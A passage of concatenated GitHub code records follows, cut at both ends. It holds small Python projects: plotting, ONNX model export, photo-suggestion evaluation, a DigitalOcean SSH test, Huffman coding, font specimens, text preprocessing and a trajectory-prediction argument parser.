X,Y\nx = df[\"Fecha\"]\ny = df[\"Hora\"]\n\n# creo el grafico\nfig = figure(\n sizing_mode=\"stretch_both\", # para que sea responsivo\n tools=\"pan,wheel_zoom,save,reset\" # elijo los botones del costado a mostrar\n )\n# seteo que por defecto este activado wheelzoom (hacer zoom con la ruedita del mouse)\nfig.toolbar.active_scroll = fig.select_one(WheelZoomTool) \n\n# formateo eje X\nfig.xaxis.formatter=DatetimeTickFormatter(\n hours=[\"%d %B %Y\"],\n days=[\"%d %B %Y\"],\n months=[\"%d %B %Y\"],\n years=[\"%d %B %Y\"],\n)\n\n# inclino label de eje X\nfig.xaxis.major_label_orientation = 3.14/4\n\n# formateo eje Y\nfig.yaxis.formatter=DatetimeTickFormatter(\n minutes=[\"%H:%M:%S\"],\n hours=[\"%H:%M:%S\"],\n)\n\n# personalizo cantidad de labels en cada eje\nfig.xaxis[0].ticker.desired_num_ticks = 15\nfig.yaxis[0].ticker.desired_num_ticks = 15\n\n# seteo tema \ntemas = ['caliber','dark_minimal', 'light_minimal']\ncurdoc().theme = temas[1]\n\n\n####### inicio seteo del popup para cada circulito ######\ndf[\"Fecha_string\"]=df[\"Fecha\"].dt.strftime(\"%Y-%m-%d\")\ndf[\"Hora_string\"]=df[\"Hora\"].dt.strftime(\"%H:%M:%S\")\n\ncds = ColumnDataSource(data=dict(\n Fecha=df[\"Fecha\"],\n Hora=df[\"Hora\"],\n Fecha_string=df[\"Fecha_string\"],\n Hora_string=df[\"Hora_string\"]\n))\n\nhover = HoverTool(tooltips=[\n (\"Fecha\", \"@Fecha_string\"),\n (\"Hora\", \"@Hora_string\")\n])\n\nfig.add_tools(hover)\n###### fin de seteo de popup ######\n\n\n# creo los puntos\nfig.circle(x='Fecha', y='Hora',\n source=cds,\n size=7\n)\n\n# exporto el html\noutput_file(\"spliktv_activacion.html\")\n\n# guardo el grafico\nsave(fig)\n","repo_name":"matichewer/Activate-SplikTv-app","sub_path":"plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20604247271","text":"import open_clip\nimport glob\nimport os\nimport PIL.Image\nimport tqdm\nimport torch\nimport numpy as np\nfrom torch.utils.data import DataLoader, Dataset\nfrom argparse import ArgumentParser\nfrom open_clip.pretrained import _PRETRAINED\n\nif __name__ == \"__main__\":\n\n parser = ArgumentParser()\n parser.add_argument(\"output_path\", type=str)\n parser.add_argument(\"--image_size\", type=int, default=224)\n parser.add_argument(\"--model_name\", type=str, default=\"ViT-B-32\")\n parser.add_argument(\"--pretrained\", type=str, default=\"laion2b_s34b_b79k\")\n parser.add_argument(\"--device\", type=str, default=\"cuda\")\n args = parser.parse_args()\n\n\n model_clip, _, preprocess = open_clip.create_model_and_transforms(\n args.model_name, \n pretrained=args.pretrained\n )\n\n class ModelWrapper(torch.nn.Module):\n def __init__(self, model):\n super().__init__()\n self.model = model\n\n def forward(self, x):\n return self.model.encode_image(x)\n\n model = ModelWrapper(model_clip)\n model = model.cuda().eval()\n\n data = torch.randn(1, 3, args.image_size, args.image_size).cuda()\n\n torch.onnx.export(\n model,\n (data,),\n args.output_path,\n input_names=['input'],\n output_names=['output'],\n dynamic_axes={\n 'input': {0: 'batch_size', 2: \"height\", 3: \"width\"},\n 'output': {0: 'batch_size', 2: \"height\", 3: \"width\"}\n }\n )","repo_name":"NVIDIA-AI-IOT/clip-distillation","sub_path":"export_openclip_onnx.py","file_name":"export_openclip_onnx.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"53"} +{"seq_id":"7419220448","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 14 11:08:32 2016\n\n@author: oisin-brogan\n\"\"\"\nimport pandas as pd\nimport os, sys, shutil\nsys.path.append('/Users/oisin-brogan/Code/similar_images')\nfrom generate_hashes import generate_hashes\nfrom process_results import load_dictionary\nfrom read_exif import read_exif\nimport rules\nfrom functools import reduce\n\n###Parameters#### Final version will parse from terminal\nstep_photos_path = '/Users/oisin-brogan/Downloads/step_photos2/'\nc_m_photos_path = '/Users/oisin-brogan/Downloads/moderated_photos/'\nsuggestions_fldr_name = 'suggestions_/'\n\nexif_tag = 'datetime'\n\nhashs = ['puzzle', 'phash', 'dhash', 'whash']\n\npre_processing_rules = [rules.set_up_db_groups,\n rules.dup_removal_by_min_time,\n rules.dup_removal_by_hash_timed]\npre_processing_args = [(),\n (pd.Timedelta(seconds = 70),),\n ('user', 25, pd.Timedelta(minutes = 30), 'phash')]\nmain_rule = rules.three_similar_concurrent\nmain_rule_args = ('user', 40, pd.Timedelta(minutes = 150), 'whash')\npost_processing_rules = [rules.merge_similar_suggestions]\npost_processing_args = [(2,)]\nrules_to_apply = (pre_processing_rules, main_rule, post_processing_rules)\n\n####Prepare data####\n#Load in step photos data\nstep_photos_db = pd.read_csv(step_photos_path + 'db.csv')\nc_m_photos_db = pd.read_csv(c_m_photos_path + 'db.csv')\n\n#Load in classified and moderated photos\n\n#Read EXIF data\nread_exif(exif_tag, step_photos_path, step_photos_path + 'exif_data.txt')\n\ndef read_exif_txt(txt_path):\n datetimes = {}\n with open(txt_path, 'r') as f:\n lines = f.readlines()\n for line in lines:\n if line.startswith('/'):\n key = line.split('//')[1][:-5] #getting just image id\n datetimes[key] = \"\"\n else:\n datetimes[key] = line.split('value ')[1].strip()\n return datetimes\n \ndef add_taken_at(db, txt_path):\n df = db.copy()\n dic = read_exif_txt(txt_path)\n series = pd.Series(dic)\n df = df.set_index('image_id')\n df.loc[:, 'taken_at'] = series\n df = df.reset_index()\n \n return df\n\nstep_photos_db = add_taken_at(step_photos_db, step_photos_path + 'exif_data.txt')\n\n#Convert time strings to datetimes\nstep_photos_db.taken_at = step_photos_db.taken_at.map(rules.convert_exif_to_datetime)\nc_m_photos_db.taken_at = c_m_photos_db.taken_at.map(rules.convert_ckpd_to_datetime)\n\n#Hashes \n#Store step photos in recipe spefic dirs (if not already done so)\nsp_recipes = set(step_photos_db.recipe_id)\nfor recipe_id in sp_recipes:\n recipe_fldr = step_photos_path + 'by_recipe/' + str(recipe_id)\n if not os.path.exists(recipe_fldr):\n print(\"Moving to recipe folder {}\".format(recipe_id))\n os.makedirs(recipe_fldr)\n relevant_photos = step_photos_db[step_photos_db.recipe_id == recipe_id]['image_id'].values\n for image_id in relevant_photos:\n shutil.copyfile(step_photos_path + str(image_id) + '.jpg',\n recipe_fldr + '/' + str(image_id) + '.jpg')\n #else we assume the photos have already been moved - do nothing\n\n#Store c+m photos in user spefic dirs (if not already done so)\ncm_users = set(c_m_photos_db.user_id)\nfor user_id in cm_users:\n usr_fldr = c_m_photos_path + 'by_user/' + str(user_id)\n if not os.path.exists(usr_fldr):\n print(\"Moving to user folder {}\".format(user_id))\n os.makedirs(usr_fldr)\n relevant_photos = c_m_photos_db[c_m_photos_db.user_id == user_id]['image_id'].values\n for image_id in relevant_photos:\n shutil.copyfile(c_m_photos_path + str(image_id) + '.jpg',\n usr_fldr + '/' + str(image_id) + '.jpg')\n #else we assume the photos have already been moved - do nothing\n\n\n#Generate required hashes\nfor recipe_id in sp_recipes:\n recipe_fldr = step_photos_path + 'by_recipe/' + str(recipe_id) + '/'\n for h in hashs:\n if not os.path.exists(recipe_fldr + '{}.txt'.format(h)): #Don't repeat work\n generate_hashes(h, recipe_fldr, recipe_fldr + '{}.txt'.format(h))\n\nfor user_id in cm_users:\n usr_fldr = c_m_photos_path + 'by_user/' + str(user_id) + '/'\n for h in hashs:\n if not os.path.exists(usr_fldr + '{}.txt'.format(h)): #Don't repeat work\n generate_hashes(h, usr_fldr, usr_fldr + '{}.txt'.format(h))\n \n####Apply Rule#####\n#Load the asked for rule\n#rule = rules.rule_dict[rule_to_apply]\n#Apply rule with parameters\nc_m_by_user = c_m_photos_db.groupby('user_id')\nsuggestions = c_m_by_user.apply(rules.general_rule_applier, *rules_to_apply,\n pre_args = pre_processing_args,\n main_args = main_rule_args,\n post_args = post_processing_args)\n\n####Performance metrics####\n#Store suggestions\nif not os.path.exists(c_m_photos_path + suggestions_fldr_name):\n os.mkdir(c_m_photos_path + suggestions_fldr_name)\n\ndef create_photo_list(list_of_photos, user_id, counter):\n dst_path = c_m_photos_path + suggestions_fldr_name + '{}/{}/'.format(user_id, counter)\n \n if not os.path.exists(dst_path):\n os.makedirs(dst_path)\n \n #Create text file with the image ids\n with open(dst_path+'image_list.txt', 'w') as f:\n for image in list_of_photos:\n f.write(image + '.jpg\\n')\n\n#Store the suggestions in seperate folders\nfor user_id, values in zip(suggestions.index, suggestions.values):\n for i, suggestion in enumerate(values):\n flat_suggestion = reduce(lambda x,y: x+y, suggestion)\n create_photo_list(flat_suggestion, user_id, i)\n \n#Create timeline of suggestions\ndef suggestions_timeline(all_suggestion_folder, cm_db, granularity='D'):\n df = cm_db.copy()\n df = df.set_index('image_id')\n \n all_timelines = []\n \n users_with_suggestions = [os.path.join(all_suggestion_folder,f) for f in \n os.listdir(all_suggestion_folder) if \n os.path.isdir(os.path.join(all_suggestion_folder,f))]\n for user_fldr in users_with_suggestions: \n user_suggestions = [os.path.join(user_fldr,f) for \n f in os.listdir(user_fldr)\n if os.path.isdir(os.path.join(user_fldr ,f))]\n timeline = []\n for suggestion_fldr in user_suggestions:\n #Read txt file of image id\n if os.path.exists(suggestion_fldr + '/image_list.txt'):\n with open(suggestion_fldr + '/image_list.txt', 'r') as f:\n images = [i[:-5] for i in f.readlines()]\n else:\n print(\"Missing image list file in {}\".format(suggestion_fldr))\n continue\n #Take the time of the last photo as the suggestion time for\n times = df.loc[images].taken_at\n suggestion_time = max(times)\n# if suggestion_time > dt.datetime(2500,1,1):\n# \n timeline.append(suggestion_time)\n #Convert to pandas Series\n timeline = pd.Series([1]*len(timeline), index = timeline, name=user_fldr.split('/')[-1])\n timeline = timeline.resample(granularity).sum()\n all_timelines.append(timeline)\n \n all_timelines = pd.concat(all_timelines, axis = 1)\n return all_timelines\n \ntimeline = suggestions_timeline(c_m_photos_path + suggestions_fldr_name, c_m_photos_db) \n\n####Time to calc precsion and recall####\n#Get all manually labelled recipes in c and m photos\ndef parse_label(fldr_path):\n with open(fldr_path + 'label.txt', 'r') as f:\n recipe = f.readline()\n if recipe == 'recipe\\n':\n lines = f.readlines()\n else:\n lines = []\n \n lines = [l.strip() for l in lines]\n indexs = [i for i,v in enumerate(lines) if v.startswith('.')]\n indexs.append(len(lines))\n list_of_recipes = [lines[indexs[i]+1:indexs[i+1]] for i in range(len(indexs)-1)]\n \n return list_of_recipes\n \nall_recipes = {}\n\nfor user_id in cm_users:\n usr_fldr = c_m_photos_path + 'by_user/' + str(user_id) + '/'\n recipes = parse_label(usr_fldr)\n all_recipes[usr_fldr.split('/')[-2]] = recipes\n\ntotal_recipes = sum([len(v) for v in all_recipes.values()])\n\n\n#Eval all our suggestions to see if they were correct\n \nresults = pd.Series(index = suggestions.index)\n#Some bullshit to get around lists as elements in pandas\nresults.iloc[0] = [[False,False]]\nresults.iloc[0] = []\n#Have to do this to get around apply treating lists as special cases\nfor u_id in results.index:\n results.loc[u_id] = rules.eval_users_suggestions(suggestions[u_id], str(u_id), all_recipes)\nrecipe_finds = results.map(lambda x: [li[0] and li[1] for li in x])\nextra_photos = results.map(lambda x: [li[0] for li in x])\nsuff_cover = results.map(lambda x: [li[1] for li in x])\n\n#Calc some metrics\ntotal_suggestions = recipe_finds.apply(lambda x: len(x) if x else pd.np.NAN).sum()\ntotal_recipe_finds = recipe_finds.apply(lambda x: sum(x) if x else pd.np.NAN).sum()\nprecision = total_recipe_finds/float(total_suggestions)\nrecall = total_recipe_finds/float(total_recipes)","repo_name":"OisinB/step_suggestions","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24833997996","text":"\n# End-to-end exercising.\n# Exercises:\n# distroImages, makeDroplet, isUp, sshConn, do, put, get,\n# shutdownAllDroplets, myDroplets.\n\nimport time\nimport logging\nimport doUtils\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef test_doUtilsAndSshConn():\n\n log = logging.getLogger('test_doUtilsAndSshConn')\n\n log.info(\"get the id of an image...\")\n ubuntuImages = [img for img in doUtils.distroImages() if img[1] == 'Ubuntu']\n id = ubuntuImages[0][0]\n\n log.info(\"make a droplet VPS, wait for it to come up...\")\n # (Note that network issues could cause this needed first\n # step to fail.)\n dParms = doUtils.makeDroplet(id)\n isUp = doUtils.isUp(dParms['ip address'], nTries=7)\n assert isUp\n\n log.info(\"make an ssh connection to the droplet...\")\n sc = doUtils.SshConn(dParms['ip address'], 'adminutil', keyFname=dParms['pemFilePathname'])\n\n log.info(\"execute a command, get its output...\")\n _, o, _ = sc.do('pwd')\n pwdOut = o.readlines()\n assert pwdOut == ['/home/adminutil\\n']\n\n log.info(\"put a file to the droplet...\")\n with open('_test.txt', 'w') as f:\n print(\"testing testing\", file=f)\n sc.put('_test.txt', '_test2.txt')\n\n log.info(\"check that the new file is there...\")\n _, o, _ = sc.do('ls')\n lsOut = o.readlines()\n assert lsOut == ['_test2.txt\\n']\n\n log.info(\"get a file from the droplet...\")\n sc.get('_test2.txt', '_test2.txt')\n with open('_test2.txt', 'r') as f:\n contents = f.readlines()\n assert contents == ['testing testing\\n']\n\n # Cleanup:\n log.info(\"shut the droplet down...\")\n doUtils.shutdownAllDroplets()\n\n log.info(\"and destroy it...\")\n dParms['droplet'].destroy()\n\n log.info(\"check that it's gone...\")\n time.sleep(3)\n ds = doUtils.myDroplets()\n assert dParms['droplet'].id not in ds\n\n log.info(\"DONE\")\n","repo_name":"jjkimball/doUtils","sub_path":"tests/test_doUtilsAndSshConn.py","file_name":"test_doUtilsAndSshConn.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37401026909","text":"import heapq\r\n\r\nclass node:\r\n def __init__(self, freq, symbol, left=None, right=None):\r\n\r\n self.freq = freq\r\n\r\n self.symbol = symbol\r\n\r\n self.left = left\r\n\r\n self.right = right\r\n\r\n self.huff = ''\r\n\r\n def __lt__(self, nxt):\r\n return self.freq < nxt.freq\r\n\r\ndef printNodes(node, val=''):\r\n # pass\r\n\r\n #create newVal\r\n newVal = val + str(node.huff)\r\n\r\n #if node --> not an edge node --> traverse there\r\n if node.left:\r\n printNodes(node.left, newVal)\r\n if node.right:\r\n printNodes(node.right, newVal)\r\n\r\n #if node --> edge node --> print\r\n if(not node.left and not node.right):\r\n print(f\"{node.symbol} -> {newVal}\")\r\n\r\nchars = ['a', 'b', 'c', 'd', 'e', 'f']\r\n\r\nfreq = [5, 9, 12, 13, 16, 45]\r\n\r\nnodes = []\r\n\r\nfor x in range(len(chars)):\r\n heapq.heappush(nodes, node(freq[x], chars[x]))\r\n\r\nwhile len(nodes)>1:\r\n\r\n #sort\r\n left = heapq.heappop(nodes)\r\n right = heapq.heappop(nodes)\r\n\r\n #direction\r\n left.huff = 0\r\n right.huff = 1\r\n\r\n #combine smallest nodes and make parent node\r\n newNode = node(left.freq+right.freq, left.symbol+right.symbol, left, right)\r\n\r\n #push it into library\r\n heapq.heappush(nodes, newNode)\r\n\r\n#display huffman tree - print the function\r\nprintNodes(nodes[0])\r\n","repo_name":"NishantSKumbhar/LP","sub_path":"LP3/DAA/huffman/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22680004641","text":"import torch\nimport torch.nn.functional as F\n\n\ndef ensemble_max_response_pre(config, model, train_loader, val_loader):\n return model, {} # nothing\n\n\ndef ensemble_max_response_metric(config, method_variables, model, imgs, targets):\n assert isinstance(model, list) and len(model) > 1\n\n res = []\n for m_i in range(len(model)):\n with torch.no_grad():\n preds = model[m_i](imgs)\n softmax_preds = F.softmax(preds, dim=1)\n res.append(softmax_preds)\n res = torch.stack(res, dim=0) # num models, num samples, num classes\n avg_preds = res.mean(dim=0) # num_samples, classes\n assert len(avg_preds.shape) == 2\n top_classes_preds, top_classes = avg_preds.max(dim=1) # num_samples\n assert len(top_classes.shape) == 1 and len(top_classes_preds.shape) == 1\n\n correct = top_classes.eq(targets)\n unreliability = 1. - top_classes_preds\n\n return unreliability, correct\n","repo_name":"xu-ji/subfunctions","sub_path":"util/methods/ensemble_max_response.py","file_name":"ensemble_max_response.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"31171191351","text":"from random import randint\nfrom time import sleep\nnúmerosSorteados = []\n\ndef sorteio(lista):\n print(f'Sorteando {len(lista)} valores da lista:', end=' ')\n for c in range(0, 5):\n lista.append(randint(1, 10))\n print(lista[c], end=' ')\n sleep(0.3)\n print('PRONTO!')\n\ndef somaPar(lista):\n soma = 0\n for c in lista:\n if c % 2 == 0:\n soma += c\n print(f'Somando os valores pares de {lista}, temos {soma}')\n\n\nsorteio(númerosSorteados)\nsomaPar(númerosSorteados)\n\n","repo_name":"Nadirlene/Exercicios-python","sub_path":"Exerciciospython2/Função/e100.py","file_name":"e100.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16014060963","text":"from pagebot.style import getRootStyle, LEFT\nfrom pagebot.document import Document\nfrom pagebot.elements.pbpage import Template\nfrom pagebot.composer import Composer\nfrom pagebot.typesetter import Typesetter\nfrom pagebot.elements import Galley, Rect\nfrom pagebot.elements.variablefonts.variablecube import VariableCube\nfrom pagebot.fonttoolbox.variablefontbuilder import getVariableFont\n \nDEBUG = False\n\nSHOW_GRID = DEBUG\nSHOW_GRID_COLUMNS = DEBUG\nSHOW_BASELINE_GRID = DEBUG\nSHOW_FLOW_CONNECTIONS = DEBUG\n\nEXPORT_PATH = 'export/variableFontDesign.pdf'\n \n# Get the default root style and overwrite values for this document.\nU = 7\nbaselineGrid = 2*U\nlistIndent = 1.5*U\n\nRS = getRootStyle(\n u = U, # Page base unit\n # Basic layout measures altering the default rooT STYLE.\n w = 595, # Om root level the \"w\" is the page width 210mm, international generic fit.\n h = 11 * 72, # Page height 11\", international generic fit.\n ml = 7*U, # Margin left rs.mt = 7*U # Margin top\n baselineGrid = baselineGrid,\n g = U, # Generic gutter.\n # Column width. Uneven means possible split in 5+1+5 or even 2+1+2 +1+ 2+1+2\n # 11 is a the best in that respect for column calculation.\n cw = 11*U, \n ch = 6*baselineGrid - U, # Approx. square and fitting with baseline.\n listIndent = listIndent, # Indent for bullet lists\n listTabs = [(listIndent, LEFT)], # Match bullet+tab with left indent.\n # Display option during design and testing\n showGrid = SHOW_GRID,\n showGridColumns = SHOW_GRID_COLUMNS,\n showBaselineGrid = SHOW_BASELINE_GRID,\n showFlowConnections = SHOW_FLOW_CONNECTIONS,\n # Text measures\n leading = baselineGrid,\n rLeading = 0,\n fontSize = 9\n)\n# Tracking presets\nH1_TRACK = H2_TRACK = 0.015 # 1/1000 of fontSize, multiplier factor.\nH3_TRACK = 0.030 # Tracking as relative factor to font size.\nP_TRACK = 0.030\n\nFONT_DIR = '../../../fonts/'\nFONT_NAME = 'BitcountGrid-GX.ttf'\nFONT_PATH = FONT_DIR + FONT_NAME\n\n# ----------------------------------------------------------------- \ndef makeSpecimen(rs):\n \n # Create new document with (w,h) and fixed amount of pages.\n # Make number of pages with default document size.\n # Initially make all pages default with template2\n doc = Document(rs, autoPages=2) \n\n page1 = doc[1]\n vCube = VariableCube(FONT_PATH, w=500, h=500, s='a', fontSize=86, dimensions=dict(wght=4,rnds=4))\n page1.place(vCube, 50, 160)\n\n font = getVariableFont(FONT_PATH, location=dict(wght=-0.5, rnds=2,diam=0.5))\n page2 = doc[2]\n for n in range(600):\n page2.text(FormattedString('@', font=font, fontSize=800, fill=(random(), random(), random(), 0.8)), 50+random()*100, 200+random()*100)\n return doc\n \nd = makeSpecimen(RS)\nd.export(EXPORT_PATH) \n\n","repo_name":"enathu/PageBot","sub_path":"Examples/TYPETR/Bitcount/scripts-in-progress/BitcountUsage.py","file_name":"BitcountUsage.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"35963738435","text":"from nltk.tokenize import sent_tokenize, word_tokenize # for tokenizing sentences and words\r\nimport re # for removing multiple \\s characters and source formatting\r\nimport local_util as u\r\nlogger = u.get_logger( __name__ ) # https://docs.python.org/3/howto/logging.html\r\n\r\n\r\nclass preprocess:\r\n\tdef __init__(self):\r\n\t\tself.STOP_WORDS = None\r\n\t\tself.STOP_TOKENIZE = True # +D3.err, original loop above: no change, still R1.R=0.22264.\r\n\t\tself.STOP_QRFLAG = True # Whether or not to apply stopwords to qrmatrix population.\r\n\t\tself.STOP_DEBUG_CUTOFF = 50 # Only dump the first 50 stop_word hits.\r\n\t\tself.stop_words = self.get_stop_words()\r\n\t\tself.stop_file = \"src/stop_words\"\r\n\r\n\tdef get_stop_words(self):\r\n\r\n\t if self.STOP_WORDS:\r\n\t return self.STOP_WORDS # recycle what we already have.\r\n\t # If we reach this point, STOP_WORDS is None so we need to load it.\r\n\t self.STOP_WORDS = dict( ) # start a new dictionary,\r\n\t self.stop_words = self.STOP_WORDS # jgreve: aliasing original var name (lower case stop_wrods)\r\n\t # so I don't edit the actual logic.\r\n\t \r\n\t self.stop_file = \"src/stop_words\"\r\n\t logger.info('get_stop_words(): loading stop_words from %s', self.stop_file )\r\n\t stops = open(self.stop_file)\r\n\t stop_lines = stops.read().split(\"\\n\")\r\n\r\n\t #for line in stop_lines:\r\n\t # line = line.lower()\r\n\t # if line not in stop_words:\r\n\t # stop_words[line] = 0\r\n\r\n\t logger.info('get_stop_words(): loading stop_words from %s', self.stop_file )\r\n\t stop_line_cnt = 0\r\n\t for line in stop_lines:\r\n\t stop_line_cnt += 1\r\n\t line = line.lower().strip()\r\n\t if self.STOP_TOKENIZE:\r\n\t words = word_tokenize( line )\r\n\t # logger.debug('stop_words[{:03d}]: line=\"{}\" --> words={}'.format(stop_line_cnt, line, words ))\r\n\t for word in words:\r\n\t self.stop_words[word] = 0\r\n\t else:\r\n\t # original D3 code.\r\n\t if line not in self.stop_words:\r\n\t self.stop_words[line] = 0\r\n\t msg = 'get_stop_words(): loaded #stop_words=%d, #lines=%d, STOP_TOKENIZE=%s STOP_QRFLAG=%s' % ( len(self.stop_words), stop_line_cnt, str(self.STOP_TOKENIZE), str(self.STOP_QRFLAG) )\r\n\t logger.info( msg )\r\n\t u.eprint(msg)\r\n\t return self.STOP_WORDS # important: this *must* still point to the same thing stop_words does.\r\n\r\n\t# Return list of tokenized words from sentence\r\n\tdef preprocess_words(self, sentence):\r\n\t raw_words = word_tokenize(sentence)\r\n\t norm_words = []\r\n\t words = []\r\n\t#-----------------------------------------------------------------------------\r\n\r\n\t # before D3.err (d3_orig) yields R1.R = 0.22264\r\n\t if not self.STOP_QRFLAG:\r\n\t # Original D3 code, here for human traceability\r\n\t for w in raw_words:\r\n\t if re.search(\"[a-zA-Z]\", w) != None:\r\n\t norm_words.append(w.lower())\r\n\t # words.append(w)\r\n\t else:\r\n\t # This started working in post-hoc anlaysis, then didn't\r\n\t # with a minor refactoring, leading the 2nd stopword bug.\r\n\t for w in raw_words:\r\n\t if re.search(\"[a-zA-Z]\", w) != None:\r\n\t w = w.lower()\r\n\t if w not in self.stop_words:\r\n\t norm_words.append(w) # keep it\r\n\t else:\r\n\t self.stop_words[w] += 1 # track how often we \"hit\" this stop word.\r\n\t if self.STOP_DEBUG_CUTOFF >= 1:\r\n\t self.STOP_DEBUG_CUTOFF -= 1\r\n\t logger.debug('stop_words: hit w=\"%s\", so not adding to norm_words', w )\r\n\r\n\t # The following yields R1.R = 0.24428\r\n\t #------------------------------------\r\n\t #if w not in stop_words:\r\n\t # norm_words.append(w) # keep it\r\n\t #------------------------------------\r\n\r\n\t #------------------------------------\r\n\t # The following yields R1.R = 0.24428\r\n\t #------------------------------------\r\n\t #if STOP_TOKENIZE:\r\n\t # # we'll check stopwords in the next loop\r\n\t # # (since the stop words are tokenized).\r\n\t # norm_words.append(w.lower())\r\n\t #else:\r\n\t # # let's check stopwords now.\r\n\t # w = w.lower()\r\n\t # if w not in stop_words:\r\n\t # norm_words.append(w) # keep it\r\n\t # else:\r\n\t # stop_words[w] += 1 # track how much our stopwords actually stop.\r\n\t #------------------------------------\r\n\t # words.append(w)\r\n\t#-----------------------------------------------------------------------------\r\n\r\n\t for w in norm_words:\r\n\t if w not in self.stop_words:\r\n\t words.append(w)\r\n\t # jgreve: this uses stopword logic but doesn't\r\n\t # make it into qrmatrix so leaving as-is.\r\n\t return words, norm_words\r\n\r\n\r\n\t# Return sentences from paragraph\r\n\tdef preprocess_sents(self, paragraph):\r\n\t sentences = sent_tokenize(paragraph)\r\n\t return sentences\r\n\r\n\t# Return a list of all the words (with frequency counts) in a docset\r\n\tdef words_from_docset(self, docset):\r\n\t\tdocset_words = {}\r\n\t\tfor idx, article in enumerate(docset.articles):\r\n\t\t\t\tparagraphs = article.paragraphs\r\n\t\t\t\tif len(paragraphs):\r\n\t\t\t\t\tfor paragraph in paragraphs:\r\n\t\t\t\t\t\tsentences = self.preprocess_sents(paragraph)\r\n\t\t\t\t\t\tfor sentence in sentences:\r\n\t\t\t\t\t\t\twords, _ = self.preprocess_words(sentence)\r\n\t\t\t\t\t\t\tfor word in words:\r\n\t\t\t\t\t\t\t\tif word in docset_words:\r\n\t\t\t\t\t\t\t\t\tdocset_words[word] += 1\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\tdocset_words[word] = 1\r\n\t\treturn docset_words","repo_name":"JoshuaMathias/summarizer","sub_path":"src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14922709030","text":"import argparse\n\nfrom baselinev2.nn.social_lstm.model import LINEAR, LSTM\n\n\ndef bool_flag(v):\n if isinstance(v, bool):\n return v\n elif v.lower() in (\"yes\", \"true\", \"y\", \"1\"):\n return True\n elif v.lower() in (\"no\", \"false\", \"n\", \"0\"):\n return False\n else:\n raise argparse.ArgumentTypeError(\"Boolean value excepted!\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\"Trajectory Prediction Basics\")\n\n # Configs for Model\n parser.add_argument(\"--model_name\", default=\"\", type=str, help=\"Define model name for saving\")\n parser.add_argument(\"--model_type\", default=\"lstm\", type=str,\n help=\"Define type of model. Choose either: linear, lstm or social-lstm\")\n parser.add_argument(\"--save_model\", default=True, type=bool_flag, help=\"Save trained model\")\n parser.add_argument(\"--nl_ADE\", default=False, type=bool_flag, help=\"Use nl_ADE\")\n parser.add_argument(\"--load_model\", default=False, type=bool_flag, help=\"Specify whether to load existing model\")\n parser.add_argument(\"--lstm_pool\", default=False, type=bool_flag, help=\"Specify whether to enable social pooling\")\n parser.add_argument(\"--pooling_type\", default=\"social_pooling\", type=str, help=\"Specify pooling method\")\n parser.add_argument(\"--neighborhood_size\", default=10.0, type=float, help=\"Specify neighborhood size to one side\")\n parser.add_argument(\"--grid_size\", default=10, type=int, help=\"Specify grid size\")\n parser.add_argument(\"--args_set\", default=\"\", type=str,\n help=\"Specify predefined set of configurations for respective model. \"\n \"Choose either: lstm or social-lstm\")\n\n # Configs for data-preparation\n parser.add_argument(\"--dataset_name\", default=\"to_be_defined\", type=str, help=\"Specify dataset\")\n parser.add_argument(\"--dataset_type\", default=\"square\", type=str,\n help=\"Specify dataset-type. For real datasets choose: 'real'. \"\n \"For synthetic datasets choose either 'square' or 'rectangle'\")\n parser.add_argument(\"--obs_len\", default=8, type=int, help=\"Specify length of observed trajectory\")\n parser.add_argument(\"--pred_len\", default=12, type=int, help=\"Specify length of predicted trajectory\")\n parser.add_argument(\"--data_augmentation\", default=True, type=bool_flag,\n help=\"Specify whether or not you want to use data augmentation\")\n parser.add_argument(\"--batch_norm\", default=False, type=bool_flag, help=\"Batch Normalization\")\n parser.add_argument(\"--max_num\", default=1000000, type=int, help=\"Specify maximum number of ids\")\n parser.add_argument(\"--skip\", default=20, type=int, help=\"Specify skipping rate\")\n parser.add_argument(\"--PhysAtt\", default=\"\", type=str, help=\"Specify physicalAtt\")\n parser.add_argument(\"--padding\", default=True, type=bool_flag, help=\"Specify if padding should be active\")\n parser.add_argument(\"--final_position\", default=False, type=bool_flag,\n help=\"Specify whether final positions of pedestrians should be passed to model or not\")\n\n # Configs for training, validation, testing\n parser.add_argument(\"--batch_size\", default=32, type=int, help=\"Specify batch size\")\n parser.add_argument(\"--wd\", default=0.03, type=float, help=\"Specify weight decay\")\n parser.add_argument(\"--lr\", default=0.001, type=float, help=\"Specify learning rate\")\n parser.add_argument(\"--encoder_h_dim\", default=64, type=int, help=\"Specify hidden state dimension h of encoder\")\n parser.add_argument(\"--decoder_h_dim\", default=32, type=int, help=\"Specify hidden state dimension h of decoder\")\n parser.add_argument(\"--emb_dim\", default=32, type=int, help=\"Specify dimension of embedding\")\n parser.add_argument(\"--num_epochs\", default=250, type=int, help=\"Specify number of epochs\")\n parser.add_argument(\"--dropout\", default=0.0, type=float, help=\"Specify dropout rate\")\n parser.add_argument(\"--num_layers\", default=1, type=int, help=\"Specify number of layers of LSTM/Social LSTM Model\")\n parser.add_argument(\"--optim\", default=\"Adam\", type=str,\n 